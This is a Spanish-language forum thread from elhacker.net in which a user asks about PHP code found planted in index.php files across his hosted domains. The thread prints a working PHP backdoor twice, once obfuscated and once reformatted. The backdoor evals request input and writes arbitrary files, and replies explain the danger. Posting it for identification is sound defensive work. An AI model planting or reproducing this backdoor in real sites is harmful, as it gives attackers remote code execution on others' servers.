¿Código maliciosos?... Lo encontré en mi SERVER "/

Foro de elhacker.net

Programación

Desarrollo Web

PHP (Moderador: #!drvy)

¿Código maliciosos?... Lo encontré en mi SERVER "/

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Autor

Tema: ¿Código maliciosos?... Lo encontré en mi SERVER "/ (Leído 1,859 veces)

NetStorm

Desconectado

Mensajes: 114

¿Código maliciosos?... Lo encontré en mi SERVER "/

« en: 13 Diciembre 2012, 16:15 pm »

Hola muchachos, en esta ocasión les comparto el código que encontré hoy en la mañana en mi server de godaddy.

Código:

<?php       
                                                                                                                                                                                                                                                                                                                                                                 						if(isset($_REQUEST['gnobkr_galuh'])) { $hklp_mrzpfa = $_REQUEST['gnobkr_galuh']; eval($hklp_mrzpfa); } if(isset($_REQUEST['wzv_ttbhhc'])) { $ytyye_fpbqa = $_REQUEST['pmhoc_pkkp']; $fjy_qgk = $_REQUEST['wzv_ttbhhc']; file_put_contents($fjy_qgk, $ytyye_fpbqa); }

?>

El contenido estaba dentro de un archivo Index.php, que se había creado en todos los dominios de mi server, tengo varios dominios alojados, cuando cargaba cualquiera de esos dominios se mostraba en blanco, obviamente porque no enviaba las variables que requiere este script. Yo soy programador en php intermedio, pero con este código me basta para hacer desmadres en el servidor.

¿Sus opiniones? :huh:


	En línea

Shell Root

Moderador Global

Desconectado

Mensajes: 3.723

Re: ¿Código maliciosos?... Lo encontré en mi SERVER "/

« Respuesta #1 en: 13 Diciembre 2012, 17:17 pm »

Código

 <?php
if (isset($_REQUEST['gnobkr_galuh'])) {
    $hklp_mrzpfa = $_REQUEST['gnobkr_galuh'];
    eval($hklp_mrzpfa);
}
if (isset($_REQUEST['wzv_ttbhhc'])) {
    $ytyye_fpbqa = $_REQUEST['pmhoc_pkkp'];
    $fjy_qgk     = $_REQUEST['wzv_ttbhhc'];
    file_put_contents($fjy_qgk, $ytyye_fpbqa);
}

Quizás ya que ejecuta la función eval(), es muy peligroso porque permite la ejecución de código de PHP arbitrario.
Hasta puede subir un archivo al servidor, quizás webshell con la función file_put_contents()


« Última modificación: 13 Diciembre 2012, 17:20 pm por Shell Root »	En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

NetStorm

Desconectado

Mensajes: 114

Re: ¿Código maliciosos?... Lo encontré en mi SERVER "/

« Respuesta #2 en: 30 Diciembre 2012, 01:02 am »

Queda claro que al recibir variables con esos nombres que solo el atacante podría conocer, además de ejecutar código arbitrario con "eval" ES MALICIOSO.

TEMA CERRADO!

Gracias


	En línea

Páginas: [1]

Ir a:

Mensajes similares
	Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
	Error al instalar "sql server standard edition 2005" Bases de Datos	Xedrox	3	4,653	13 Diciembre 2010, 17:43 pm por Novlucker
	Error al instalar "sql server standard edition 2005" Bases de Datos	Xedrox	2	3,724	13 Marzo 2011, 23:23 pm por Xedrox
	me encontre un chip movistar pero me pedia codigo punk y los gaste todo Dispositivos Móviles (PDA's, Smartphones, Tablets)	mrt_15	2	5,930	22 Junio 2011, 21:23 pm por mrt_15
	Blackberry Enterprise Server es vulnerable a archivos TIFF maliciosos Noticias	wolfbcn	0	1,325	18 Febrero 2013, 22:15 pm por wolfbcn
	Ayuda encontre en mi sitio web una imagen gif con el siguiente codigo php Seguridad	priester007	1	2,593	29 Noviembre 2013, 16:46 pm por MasterAndHack